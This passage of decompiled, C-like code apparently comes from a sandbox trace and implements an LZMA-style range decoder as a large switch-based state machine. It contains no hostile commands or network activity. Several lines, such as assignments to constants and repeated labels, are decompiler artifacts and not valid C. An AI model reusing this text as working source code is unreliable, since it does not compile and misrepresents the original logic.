													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
